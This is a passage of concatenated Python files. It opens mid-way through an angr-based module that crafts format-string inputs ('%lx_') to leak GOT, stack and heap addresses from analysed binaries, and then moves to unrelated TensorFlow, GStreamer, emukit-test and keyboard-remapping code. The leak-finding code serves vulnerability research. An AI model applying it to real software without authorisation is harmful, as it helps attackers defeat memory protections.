if symbolic_list[i] and symbolic_list[i] == symbolic_list[i - 1]:
count = count + 1
if count > greatest_count:
greatest_count = count
position = i - count
else:
if count > greatest_count:
greatest_count = count
position = i - 1 - count
# previous position minus greatest count
count = 0
log.info(
"[+] Found symbolic buffer at position {} of length {}".format(
position, greatest_count
)
)
if greatest_count > 0:
str_val = b"%lx_"
if bits == 64:
str_val = b"%llx_"
if self.can_constrain_bytes(
state, var_data, var_loc, position, var_len, strVal=str_val
):
log.info("[+] Can constrain bytes")
log.info("[+] Constraining input to leak")
self.constrainBytes(
state,
var_data,
var_loc,
position,
var_len,
strVal=str_val,
)
# Verify solution
# stdin_str = str(state_copy.posix.dumps(0))
# user_input = self.state.globals["inputType"]
# if str_val in solv(user_input):
# var_value = self.state.memory.load(var_loc)
# self.constrainBytes(
# self.state, var_value, var_loc, position, var_value_length
# )
# print("[+] Vulnerable path found {}".format(vuln_string))
user_input = state.globals["user_input"]
self.state.globals["input"] = solv(user_input, cast_to=bytes)
self.state.globals["type"] = "Format"
self.state.globals["position"] = position
self.state.globals["length"] = greatest_count
return True
return False
def can_constrain_bytes(self, state, symVar, loc, position, length, strVal=b"%x_"):
total_region = self.state.memory.load(loc, length)
total_format = strVal * length
# If we can constrain it all in one go, then let's do it!
if state.solver.satisfiable(
extra_constraints=[total_region == total_format[:length]]
):
log.info("Can constrain it all, let's go!")
state.add_constraints(total_region == total_format[:length])
return True
for i in tqdm.tqdm(range(length), total=length, desc="Checking Constraints"):
strValIndex = i % len(strVal)
curr_byte = self.state.memory.load(loc + i, 1)
if not state.solver.satisfiable(
extra_constraints=[curr_byte == strVal[strValIndex]]
):
return False
return True
def constrainBytes(self, state, symVar, loc, position, length, strVal=b"%x_"):
total_region = self.state.memory.load(loc, length)
total_format = strVal * length
# If we can constrain it all in one go, then let's do it!
if state.solver.satisfiable(
extra_constraints=[total_region == total_format[:length]]
):
log.info("Can constrain it all, let's go!")
state.add_constraints(total_region == total_format[:length])
return
for i in tqdm.tqdm(range(length), total=length, desc="Constraining"):
strValIndex = i % len(strVal)
curr_byte = self.state.memory.load(loc + i, 1)
if state.solver.satisfiable(
extra_constraints=[curr_byte == strVal[strValIndex]]
):
state.add_constraints(curr_byte == strVal[strValIndex])
else:
log.info(
"[~] Byte {} not constrained to {}".format(i, strVal[strValIndex])
)
def run(self, _, fmt):
if not self.checkExploitable(fmt):
return super(type(self), self).run(fmt)
class printf_leak_detect(angr.procedures.libc.printf.printf):
IS_FUNCTION = True
format_index = 0
"""
Checks userinput arg
"""
def __init__(self, format_index):
# Set user input index for different
# printf types
self.format_index = format_index
super(type(self), self).__init__()
def check_for_leak(self, fmt):
bits = self.state.arch.bits
load_len = int(bits / 8)
max_read_len = 1024
"""
For each value passed to printf
Check to see if there are any symbolic bytes
Passed in that we control
"""
state = self.state
p = self.state.project
elf = ELF(state.project.filename)
fmt_str = self._parse(fmt)
for component in fmt_str.components:
# We only want format specifiers
if (
isinstance(component, bytes)
or isinstance(component, str)
or isinstance(component, claripy.ast.BV)
):
continue
printf_arg = component
fmt_spec = component
i_val = self.va_arg("void*")
c_val = int(state.solver.eval(i_val))
c_val &= (1 << (fmt_spec.size * 8)) - 1
if fmt_spec.signed and (c_val & (1 << ((fmt_spec.size * 8) - 1))):
c_val -= 1 << fmt_spec.size * 8
if fmt_spec.spec_type in (b"d", b"i"):
s_val = str(c_val)
elif fmt_spec.spec_type == b"u":
s_val = str(c_val)
elif fmt_spec.spec_type == b"c":
s_val = chr(c_val & 0xFF)
elif fmt_spec.spec_type == b"x":
s_val = hex(c_val)[2:]
elif fmt_spec.spec_type == b"o":
s_val = oct(c_val)[2:]
elif fmt_spec.spec_type == b"p":
s_val = hex(c_val)
else:
log.warning("Unimplemented format specifier '%s'" % fmt_spec.spec_type)
continue
if isinstance(fmt_spec.length_spec, int):
s_val = s_val.rjust(fmt_spec.length_spec, fmt_spec.pad_chr)
var_addr = c_val
# Are any pointers GOT addresses?
for name, addr in elf.got.items():
if var_addr == addr:
log.info("[+] Printf leaked GOT {}".format(name))
state.globals["leaked_type"] = "function"
state.globals["leaked_func"] = name
state.globals["leaked_addr"] = var_addr
# Input to leak
user_input = state.globals["user_input"]
input_bytes = state.solver.eval(user_input, cast_to=bytes)
state.globals["leak_input"] = input_bytes
state.globals["leak_output"] = state.posix.dumps(1)
return True
# Heap and stack addrs should be in a heap or stack
# segment, but angr doesn't map those segments so the
# below call will not work
# found_obj = p.loader.find_segment_containing(var_addr)
# Check for stack address leak
# So we have a dumb check to see if it's a stack addr
stack_ptr = state.solver.eval(state.regs.sp)
var_addr_mask = var_addr >> 28
stack_ptr_mask = stack_ptr >> 28
if var_addr_mask == stack_ptr_mask:
log.info("[+] Leaked a stack addr : {}".format(hex(var_addr)))
state.globals["leaked_type"] = "stack_address"
state.globals["leaked_addr"] = var_addr
# Input to leak
user_input = state.globals["user_input"]
input_bytes = state.solver.eval(user_input, cast_to=bytes)
input_bytes = get_trimmed_input(user_input, state)
state.globals["leak_input"] = input_bytes
state.globals["leak_output"] = state.posix.dumps(1)
# Check tracked malloc addrs
if "stored_malloc" in self.state.globals.keys():
for addr in self.state.globals["stored_malloc"]:
if addr == var_addr:
log.info("[+] Leaked a heap addr : {}".format(hex(var_addr)))
state.globals["leaked_type"] = "heap_address"
state.globals["leaked_addr"] = var_addr
# Input to leak
user_input = state.globals["user_input"]
input_bytes = state.solver.eval(user_input, cast_to=bytes)
state.globals["leak_input"] = input_bytes
state.globals["leak_output"] = state.posix.dumps(1)
def run(self, fmt):
"""
Iterating over the va_args checking for a leak
will consume them and prevent us from printing
normally, so we need to make a copy.
"""
va_args_copy = copy.deepcopy(self)
va_args_copy.check_for_leak(fmt)
return super(type(self), self).run(fmt)
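# Hooking sketch (not part of the original module): both SimProcedures are meant
# to replace libc printf in an angr project, e.g.
#     project.hook_symbol("printf", printFormat(input_index=1))
# or, to watch for address leaks instead,
#     project.hook_symbol("printf", printf_leak_detect(format_index=0))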
|
StarcoderdataPython
|
11300555
|
# GitHub stars: 1-10
# Import tensorflow with correct log level
import inceptionkeynet
__log_levels = { 'DEBUG': '0', 'INFO': '1', 'WARNING': '2' }
if inceptionkeynet.TERMINAL_LOG_LEVEL in __log_levels:
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = __log_levels[inceptionkeynet.TERMINAL_LOG_LEVEL]
import tensorflow as tf
from inceptionkeynet.machine_learning.__hyperparameters import Hyperparameters
def get_optimizer(hyperparameters: Hyperparameters) -> tf.keras.optimizers.Optimizer:
optimizer = hyperparameters[Hyperparameters.OPTIMIZER].value
if optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(learning_rate=0.001, momentum=.9)
optimizer = tf.keras.optimizers.get(optimizer)
    if hyperparameters[Hyperparameters.LEARNING_RATE].value is not None:
optimizer.learning_rate = hyperparameters[Hyperparameters.LEARNING_RATE].value
return optimizer
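# Usage sketch (not part of the original module; assumes a populated
# ``Hyperparameters`` instance as defined elsewhere in inceptionkeynet):
#     optimizer = get_optimizer(hyperparameters)
#     model.compile(optimizer=optimizer, loss="categorical_crossentropy")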
|
StarcoderdataPython
|
1845781
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gst import *
def decoded_file_src(filename):
return [
Source('file', location=filename),
Filter('decodebin'),
]
def v4l2_src(fmt):
return [
Source('v4l2', device=fmt.device),
Caps('video/x-raw', format=fmt.pixel, width=fmt.size.width, height=fmt.size.height,
framerate='%d/%d' % fmt.framerate),
]
def display_sink():
return Sink('glsvgoverlay', name='glsink'),
def h264_sink():
return Sink('app', name='h264sink', emit_signals=True, max_buffers=1, drop=False, sync=False)
def inference_pipeline(layout, stillimage=False):
size = max_inner_size(layout.render_size, layout.inference_size)
return [
Filter('glfilterbin', filter='glbox'),
Caps('video/x-raw', format='RGB', width=layout.inference_size.width, height=layout.inference_size.height),
Sink('app', name='appsink', emit_signals=True, max_buffers=1, drop=True, sync=False),
]
# Display
def image_display_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('imagefreeze'),
Caps('video/x-raw', framerate='30/1'),
Filter('glupload'),
Tee(name='t')],
[Pad('t'),
Queue(),
display_sink()],
[Pad('t'),
Queue(max_size_buffers=1, leaky='downstream'),
inference_pipeline(layout)],
)
def video_display_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('glupload'),
Tee(name='t')],
[Pad('t'),
Queue(),
display_sink()],
[Pad('t'),
Queue(max_size_buffers=1, leaky='downstream'),
inference_pipeline(layout)],
)
def camera_display_pipeline(fmt, layout):
return (
[v4l2_src(fmt),
Filter('glupload'),
Tee(name='t')],
[Pad('t'),
Queue(),
display_sink()],
[Pad(name='t'),
Queue(max_size_buffers=1, leaky='downstream'),
inference_pipeline(layout)],
)
# Headless
def image_headless_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('imagefreeze'),
Filter('glupload'),
inference_pipeline(layout)],
)
def video_headless_pipeline(filename, layout):
return (
[decoded_file_src(filename),
Filter('glupload'),
inference_pipeline(layout)],
)
def camera_headless_pipeline(fmt, layout):
return (
[v4l2_src(fmt),
Filter('glupload'),
inference_pipeline(layout)],
)
# Streaming
def video_streaming_pipeline(filename, layout):
return (
[Source('file', location=filename),
Filter('qtdemux'),
Tee(name='t')],
[Pad('t'),
Queue(max_size_buffers=1),
Filter('h264parse'),
Caps('video/x-h264', stream_format='byte-stream', alignment='nal'),
h264_sink()],
[Pad('t'),
Queue(max_size_buffers=1),
Filter('decodebin'),
inference_pipeline(layout)],
)
def camera_streaming_pipeline(fmt, profile, bitrate, layout):
return (
[v4l2_src(fmt), Tee(name='t')],
[Pad('t'),
Queue(max_size_buffers=1, leaky='downstream'),
Filter('videoconvert'),
Filter('x264enc',
speed_preset='ultrafast',
tune='zerolatency',
threads=4,
key_int_max=5,
bitrate=int(bitrate / 1000), # kbit per second.
aud=False),
Caps('video/x-h264', profile=profile),
Filter('h264parse'),
Caps('video/x-h264', stream_format='byte-stream', alignment='nal'),
h264_sink()],
[Pad('t'),
Queue(),
inference_pipeline(layout)],
)
|
StarcoderdataPython
|
3490927
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
from math import isclose
import numpy as np
import pytest
from emukit.quadrature.kernels.integration_measures import IsotropicGaussianMeasure, UniformMeasure
REL_TOL = 1e-5
ABS_TOL = 1e-4
def test_uniform_measure_shapes():
N = 5
bounds = [(-1, 1), (0, 2), (1.3, 5.0)]
D = len(bounds)
x = np.reshape(np.random.randn(D * N), [N, D])
measure = UniformMeasure(bounds)
bounds = measure.get_box()
assert len(bounds) == D
assert len(bounds[0]) == 2
res = measure.compute_density(x)
assert res.shape == (N,)
# sampling capabilities
assert measure.can_sample
res = measure.get_samples(N)
assert res.shape == (N, D)
def test_uniform_measure_wrong_bounds():
bounds = [(-1, 1), (3, 2), (1.3, 5.0)]
with pytest.raises(ValueError):
UniformMeasure(bounds)
def test_uniform_measure_gradients():
measure_bounds = [(-1, 2), (0, 1)]
measure = UniformMeasure(bounds=measure_bounds)
N = 3
D = len(measure_bounds)
x = np.reshape(np.random.randn(D * N), [N, D])
_check_grad(measure, x)
def test_iso_gauss_measure_shapes():
D = 4
N = 5
x = np.reshape(np.random.randn(D * N), [N, D])
measure = IsotropicGaussianMeasure(mean=np.ones(D), variance=1.0)
bounds = measure.get_box()
assert len(bounds) == D
assert len(bounds[0]) == 2
assert measure.num_dimensions == D
res = measure.compute_density(x)
assert res.shape == (N,)
# sampling capabilities
assert measure.can_sample
res = measure.get_samples(N)
assert res.shape == (N, D)
def test_iso_gauss_measure_invalid_input():
wrong_variance = -2.0
mean_wrong_dim = np.ones([3, 1])
mean_wrong_type = 0.0
with pytest.raises(ValueError):
IsotropicGaussianMeasure(mean=np.ones(3), variance=wrong_variance)
with pytest.raises(TypeError):
IsotropicGaussianMeasure(mean=mean_wrong_type, variance=1.0)
with pytest.raises(ValueError):
IsotropicGaussianMeasure(mean=mean_wrong_dim, variance=1.0)
def test_iso_gauss_measure_gradients():
D = 2
measure = IsotropicGaussianMeasure(mean=np.random.randn(D), variance=np.random.randn() ** 2)
N = 3
x = np.reshape(np.random.randn(D * N), [N, D])
_check_grad(measure, x)
def _compute_numerical_gradient(m, x, eps=1e-6):
f = m.compute_density(x)
grad = m.compute_density_gradient(x)
grad_num = np.zeros(grad.shape)
for d in range(x.shape[1]):
x_tmp = x.copy()
x_tmp[:, d] = x_tmp[:, d] + eps
f_tmp = m.compute_density(x_tmp)
grad_num_d = (f_tmp - f) / eps
grad_num[:, d] = grad_num_d
return grad, grad_num
def _check_grad(aq, x):
grad, grad_num = _compute_numerical_gradient(aq, x)
isclose_all = 1 - np.array(
[
isclose(grad[i, j], grad_num[i, j], rel_tol=REL_TOL, abs_tol=ABS_TOL)
for i in range(grad.shape[0])
for j in range(grad.shape[1])
]
)
assert isclose_all.sum() == 0
|
StarcoderdataPython
|
273832
|
#!/usr/bin/env python
import asyncio
import enum
import logging
import signal
from collections import defaultdict
import evdev
import pyudev
REMAPPED_PREFIX = '[remapped]'
class AlreadyRemappedError(Exception):
pass
class VirtualModifierState(enum.Enum):
RELEASED = enum.auto()
PRESSED_SILENT = enum.auto()
PRESSED_NOISY = enum.auto()
class VirtualModifier():
def __init__(self, keyboard, code):
self._keyboard = keyboard
self.code = code
self._pressed_keys = []
self._state = VirtualModifierState.RELEASED
self._previous_state = self._state
self._callbacks = []
@property
def active(self):
return self._state != VirtualModifierState.RELEASED
@property
def noisy(self):
return self._state == VirtualModifierState.PRESSED_NOISY
@property
def repeating_key(self):
if self._state == VirtualModifierState.PRESSED_NOISY:
            return self._pressed_keys[0]
        else:
            return None
def add_callback(self, callback):
self._callbacks.append(callback)
def press(self, key):
if key not in self._pressed_keys:
self._pressed_keys.append(key)
if len(self._pressed_keys) >= 2:
self.trigger_noisy()
def release(self, key):
self._pressed_keys.remove(key)
if not self._pressed_keys:
self._state = VirtualModifierState.RELEASED
def trigger_silent(self):
if self._pressed_keys and self._state == VirtualModifierState.RELEASED:
self._state = VirtualModifierState.PRESSED_SILENT
self._trigger()
def trigger_noisy(self):
if not self.code:
self.trigger_silent()
return
if self._pressed_keys and self._state == VirtualModifierState.RELEASED:
self._state = VirtualModifierState.PRESSED_NOISY
self._trigger()
elif self._state == VirtualModifierState.PRESSED_SILENT:
self._state = VirtualModifierState.PRESSED_NOISY
def _trigger(self):
for callback in self._callbacks:
callback()
def flush_state_change(self, sync_event):
noisy = self._state == VirtualModifierState.PRESSED_NOISY
previous_noisy = self._previous_state == VirtualModifierState.PRESSED_NOISY
if noisy and not previous_noisy:
self._keyboard.write_event(
evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self.code, 1))
elif not noisy and previous_noisy:
self._keyboard.write_event(
evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self.code, 0))
self._previous_state = self._state
class Key:
def __init__(self, keyboard):
self._keyboard = keyboard
def process_event(self, event):
return True
def flush_state_change(self, sync_event):
pass
def flush_event(self, event):
self._keyboard.write_event(event)
class TriggerKey:
def __init__(self, key, *callbacks):
self._key = key
self._callbacks = callbacks
def _trigger(self):
for callback in self._callbacks:
callback()
def process_event(self, event):
if event.value == 1:
self._trigger()
return self._key.process_event(event)
def flush_state_change(self, sync_event):
self._key.flush_state_change(sync_event)
def flush_event(self, event):
self._key.flush_event(event)
def __getattr__(self, name):
return self._key.__getattribute__(name)
class VirtualModifierKey(Key):
def __init__(self, keyboard, virtual_modifier, **kwargs):
super().__init__(keyboard, **kwargs)
self._virtual_modifier = virtual_modifier
def process_event(self, event):
super().process_event(event)
if event.value == 0:
self._virtual_modifier.release(self)
return False
elif event.value == 1:
self._virtual_modifier.press(self)
return False
else:
return self._virtual_modifier.noisy
def flush_event(self, event):
if event.value == 2 and self._virtual_modifier.repeating_key is self:
event.code = self._virtual_modifier.code
self._keyboard.write_event(event)
class ModifierKey(VirtualModifierKey):
def __init__(self, keyboard, virtual_modifier, silent=False):
super().__init__(keyboard, virtual_modifier)
self._silent = silent
def process_event(self, event):
ret = super().process_event(event)
if event.value == 1:
if self._silent:
self._virtual_modifier.trigger_silent()
else:
self._virtual_modifier.trigger_noisy()
return ret
class OnReleaseState(enum.Enum):
RELEASED = enum.auto()
PRESSED_SINGLE = enum.auto()
PRESSED_SILENT = enum.auto()
class OnReleaseKey(Key):
def __init__(self, keyboard, extra_code, silence_modifier=None, callbacks=None, **kwargs):
super().__init__(keyboard, **kwargs)
self._extra_code = extra_code
self._silence_modifier = silence_modifier
if silence_modifier:
silence_modifier.add_callback(self.silence_release)
self._callbacks = callbacks
self._state = OnReleaseState.RELEASED
self._previous_state = self._state
def silence_release(self):
if self._state == OnReleaseState.PRESSED_SINGLE:
self._state = OnReleaseState.PRESSED_SILENT
def process_event(self, event):
if event.value == 0:
self._state = OnReleaseState.RELEASED
if self._previous_state == OnReleaseState.PRESSED_SINGLE:
if self._callbacks:
for callback in self._callbacks:
callback()
if event.value == 1:
if self._silence_modifier and self._silence_modifier.active:
self._state = OnReleaseState.PRESSED_SILENT
else:
self._state = OnReleaseState.PRESSED_SINGLE
return True
def flush_state_change(self, sync_event):
if self._previous_state == OnReleaseState.PRESSED_SINGLE and \
self._state == OnReleaseState.RELEASED:
event = evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self._extra_code, 1)
self._keyboard.write_event(event)
event.value = 0
self._keyboard.write_event(event)
self._previous_state = self._state
class OnQuickReleaseKey(OnReleaseKey):
def __init__(self, keyboard, extra_code, delay=None, **kwargs):
super().__init__(keyboard, extra_code, **kwargs)
def process_event(self, event):
ret = super().process_event(event)
if event.value == 2:
self.silence_release()
return ret
class SingleOrModifierKey(VirtualModifierKey, OnReleaseKey):
def __init__(self, keyboard, single_code, virtual_modifier, **kwargs):
super().__init__(keyboard, extra_code=single_code,
virtual_modifier=virtual_modifier,
silence_modifier=virtual_modifier, **kwargs)
class RemapKey(Key):
def __init__(self, keyboard, code):
super().__init__(keyboard)
self._code = code
def flush_event(self, event):
event.code = self._code
super().flush_event(event)
class ModKey():
def __init__(self, normal_key, virtual_modifier, modified_key):
self._normal_key = normal_key
self._virtual_modifier = virtual_modifier
self._modified_key = modified_key
self._active_key = None
self._releasing = False
self._wants_release_event = False
def process_event(self, event):
if self._releasing:
return False
if event.value == 0:
self._releasing = True
self._wants_release_event = self._active_key.process_event(event)
return True
elif event.value == 1:
if not self._active_key:
self._virtual_modifier.trigger_silent()
if self._virtual_modifier.active:
self._active_key = self._modified_key
else:
self._active_key = self._normal_key
if self._active_key:
return self._active_key.process_event(event)
else:
return False
def flush_state_change(self, sync_event):
if self._active_key:
self._active_key.flush_state_change(sync_event)
def flush_event(self, event):
if self._releasing and event.value == 0:
if self._active_key and self._wants_release_event:
self._active_key.flush_event(event)
self._wants_release_event = False
self._releasing = False
self._active_key = None
elif self._active_key:
self._active_key.flush_event(event)
def __getattr__(self, name):
return self._normal_key.__getattribute__(name)
class SecondTouchKey(OnQuickReleaseKey):
def __init__(self, keyboard, first_code, second_code, force_modifier=None, **kwargs):
super().__init__(keyboard, extra_code=first_code,
silence_modifier=force_modifier, **kwargs)
self._second_code = second_code
self._force_modifier = force_modifier
self._repeating = False
def process_event(self, event):
if event.value == 1 and self._force_modifier:
self._force_modifier.trigger_silent()
if self._force_modifier.active:
self._repeating = True
super().process_event(event)
return event.value == 2 and self._repeating
def flush_state_change(self, sync_event):
if self._state == OnReleaseState.PRESSED_SILENT and \
self._previous_state != OnReleaseState.PRESSED_SILENT:
event = evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self._second_code, 1)
self._keyboard.write_event(event)
if not self._repeating:
event.value = 0
self._keyboard.write_event(event)
if self._state != OnReleaseState.PRESSED_SILENT and \
self._previous_state == OnReleaseState.PRESSED_SILENT and \
self._repeating:
event = evdev.InputEvent(sync_event.sec, sync_event.usec,
evdev.ecodes.EV_KEY, self._second_code, 0)
self._keyboard.write_event(event)
self._repeating = False
super().flush_state_change(sync_event)
class Keyboard:
def __init__(self, path):
self._logger = logging.getLogger(type(self).__qualname__)
self._device = evdev.InputDevice(path)
name = self._device.name
if name.startswith(REMAPPED_PREFIX):
self._device.close()
raise AlreadyRemappedError()
capabilities = defaultdict(set)
for ev_type, ev_codes in self._device.capabilities().items():
if ev_type != evdev.ecodes.EV_SYN and ev_type != evdev.ecodes.EV_FF:
capabilities[ev_type].update(ev_codes)
capabilities[evdev.ecodes.EV_KEY].update({
evdev.ecodes.KEY_ESC,
evdev.ecodes.KEY_COMPOSE,
evdev.ecodes.KEY_F13,
evdev.ecodes.KEY_F14,
evdev.ecodes.KEY_F15,
evdev.ecodes.KEY_F16,
evdev.ecodes.KEY_F17,
evdev.ecodes.KEY_F18,
evdev.ecodes.KEY_F19,
evdev.ecodes.KEY_F20,
evdev.ecodes.KEY_F21,
evdev.ecodes.KEY_F22,
evdev.ecodes.KEY_F23,
evdev.ecodes.KEY_F24,
evdev.ecodes.KEY_FILE,
evdev.ecodes.KEY_HOMEPAGE,
evdev.ecodes.KEY_CALC,
evdev.ecodes.KEY_CONFIG,
evdev.ecodes.KEY_PREVIOUSSONG,
evdev.ecodes.KEY_NEXTSONG,
evdev.ecodes.KEY_PLAYPAUSE,
evdev.ecodes.KEY_STOP,
evdev.ecodes.KEY_MUTE,
evdev.ecodes.KEY_VOLUMEDOWN,
evdev.ecodes.KEY_VOLUMEUP,
evdev.ecodes.KEY_PROG1,
evdev.ecodes.KEY_PROG2,
evdev.ecodes.KEY_SEARCH,
evdev.ecodes.KEY_BACK,
evdev.ecodes.KEY_FORWARD,
})
try:
self._uinput = evdev.UInput(
events=capabilities, name=f'{REMAPPED_PREFIX} {name}')
except:
self._device.close()
raise
self._logger = self._logger.getChild(name)
self._logger.info('Initialized at %s', path)
right_alt = VirtualModifier(self, evdev.ecodes.KEY_RIGHTALT)
fn = VirtualModifier(self, None)
self._virtual_modifiers = [right_alt, fn]
basic_key = Key(self)
left_meta = TriggerKey(
OnQuickReleaseKey(self, evdev.ecodes.KEY_D, silence_modifier=right_alt),
right_alt.trigger_silent)
right_meta = TriggerKey(
OnQuickReleaseKey(self, evdev.ecodes.KEY_F, silence_modifier=right_alt),
right_alt.trigger_silent)
left_alt = TriggerKey(
OnQuickReleaseKey(self, evdev.ecodes.KEY_SEARCH, silence_modifier=right_alt),
right_alt.trigger_silent)
self._special_keys = {
evdev.ecodes.KEY_LEFTSHIFT: basic_key,
evdev.ecodes.KEY_RIGHTSHIFT: basic_key,
evdev.ecodes.KEY_LEFTCTRL: basic_key,
evdev.ecodes.KEY_RIGHTCTRL: basic_key,
evdev.ecodes.KEY_CAPSLOCK: SingleOrModifierKey(
self, evdev.ecodes.KEY_ESC, right_alt,
callbacks=[left_meta.silence_release, right_meta.silence_release]),
evdev.ecodes.KEY_LEFTALT: left_alt,
evdev.ecodes.KEY_RIGHTALT: SingleOrModifierKey(
self, evdev.ecodes.KEY_COMPOSE, right_alt,
callbacks=[left_meta.silence_release, right_meta.silence_release]),
evdev.ecodes.KEY_LEFTMETA: left_meta,
evdev.ecodes.KEY_RIGHTMETA: right_meta,
evdev.ecodes.KEY_MENU: ModifierKey(self, fn),
evdev.ecodes.KEY_COMPOSE: ModifierKey(self, fn),
evdev.ecodes.KEY_F1: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F13, evdev.ecodes.KEY_F1, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_FILE)),
evdev.ecodes.KEY_F2: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F14, evdev.ecodes.KEY_F2, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_HOMEPAGE)),
evdev.ecodes.KEY_F3: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F15, evdev.ecodes.KEY_F3, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_CALC)),
evdev.ecodes.KEY_F4: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F16, evdev.ecodes.KEY_F4, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_CONFIG)),
evdev.ecodes.KEY_F5: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F17, evdev.ecodes.KEY_F5, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_PREVIOUSSONG)),
evdev.ecodes.KEY_F6: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F18, evdev.ecodes.KEY_F6, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_NEXTSONG)),
evdev.ecodes.KEY_F7: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F19, evdev.ecodes.KEY_F7, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_PLAYPAUSE)),
evdev.ecodes.KEY_F8: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F20, evdev.ecodes.KEY_F8, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_STOP)),
evdev.ecodes.KEY_F9: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F21, evdev.ecodes.KEY_F9, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_MUTE)),
evdev.ecodes.KEY_F10: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F22, evdev.ecodes.KEY_F10, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_VOLUMEDOWN)),
evdev.ecodes.KEY_F11: ModKey(
SecondTouchKey(self, evdev.ecodes.KEY_F23, evdev.ecodes.KEY_F11, right_alt),
fn, RemapKey(self, evdev.ecodes.KEY_VOLUMEUP)),
evdev.ecodes.KEY_F12: SecondTouchKey(
self, evdev.ecodes.KEY_F24, evdev.ecodes.KEY_F12, right_alt),
evdev.ecodes.KEY_SYSRQ: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG1), right_alt, basic_key),
evdev.ecodes.KEY_SCROLLLOCK: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG1), right_alt, basic_key),
evdev.ecodes.KEY_PAUSE: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG2), right_alt, basic_key),
evdev.ecodes.KEY_BREAK: ModKey(
RemapKey(self, evdev.ecodes.KEY_PROG2), right_alt, basic_key),
evdev.ecodes.KEY_LEFT: ModKey(
basic_key, right_alt, RemapKey(self, evdev.ecodes.KEY_BACK)),
evdev.ecodes.KEY_RIGHT: ModKey(
basic_key, right_alt, RemapKey(self, evdev.ecodes.KEY_FORWARD)),
}
self._default_key = TriggerKey(
basic_key, left_meta.silence_release, right_meta.silence_release,
left_alt.silence_release, right_alt.trigger_noisy)
self._backlog = []
self._await_later = []
async def process_events(self, interrupted):
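        # Grab the device exclusively so unmodified events never reach other
        # clients, then forward events until the task is cancelled or the
        # device disappears (OSError).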
try:
with self._device.grab_context():
async for event in self._device.async_read_loop():
self._process_event(event)
except asyncio.CancelledError:
pass
except OSError:
return
except:
interrupted.set()
raise
finally:
try:
self._uinput.close()
            except (asyncio.CancelledError, OSError):
pass
try:
self._device.close()
            except (asyncio.CancelledError, OSError):
pass
self._logger.info('Closed')
def _process_event(self, event):
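        # Key handlers may buffer events (process_event returning True); the
        # backlog is replayed on the next EV_SYN, after all pending modifier
        # state changes have been flushed.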
if event.type == evdev.ecodes.EV_SYN:
for virtual_modifier in self._virtual_modifiers:
virtual_modifier.flush_state_change(event)
for key in self._special_keys.values():
key.flush_state_change(event)
for buffered_event in self._backlog:
buffered_event.sec = event.sec
buffered_event.usec = event.usec
self.get_key(buffered_event.code).flush_event(buffered_event)
self.write_event(event)
self._backlog.clear()
elif event.type == evdev.ecodes.EV_KEY:
if self.get_key(event.code).process_event(event):
self._backlog.append(event)
else:
self.write_event(event)
def get_key(self, code):
return self._special_keys.get(code, self._default_key)
def write_event(self, event):
self._logger.debug('out: %r', event)
self._uinput.write_event(event)
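# KeyboardRemapper watches udev for input devices, spawns one remapping task
# per detected keyboard and cancels that task when the device goes away.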
class KeyboardRemapper:
def __init__(self, interrupted):
self._logger = logging.getLogger(type(self).__qualname__)
self._interrupted = interrupted
self._devices = {}
self._context = pyudev.Context()
self._monitor = pyudev.Monitor.from_netlink(self._context)
self._monitor.filter_by('input')
async def start(self):
self._monitor.start()
keyboards = self._context.list_devices(
subsystem='input').match_property('ID_INPUT_KEYBOARD', True)
for device in keyboards:
self._add_device(device)
loop = asyncio.get_running_loop()
loop.add_reader(self._monitor.fileno(), self._poll_udev_event)
async def stop(self):
for task in self._devices.values():
task.cancel()
await asyncio.gather(*self._devices.values())
def _poll_udev_event(self):
device = self._monitor.poll()
action = device.action
if action == 'add' or action == 'online':
self._add_device(device)
elif action == 'remove' or action == 'offline':
self._remove_device(device)
elif action != 'change':
            self._logger.warning(
f'Unknown action {action} from {device.device_path}')
def _add_device(self, device):
device_path = device.device_path
if device_path in self._devices:
return
device_node = device.device_node
if device_node is None or not evdev.util.is_device(device_node):
return
if self._is_keyboard(device):
try:
keyboard = Keyboard(device_node)
except AlreadyRemappedError:
return
except OSError:
self._logger.exception(
f'Cannot initialize {device_path} at {device_node}')
return
task = asyncio.create_task(keyboard.process_events(self._interrupted),
name=f'remap {device_path}')
self._devices[device_path] = task
def _is_keyboard(self, device):
try:
if not device.properties.asbool('ID_INPUT_KEYBOARD'):
return False
except KeyError:
return False
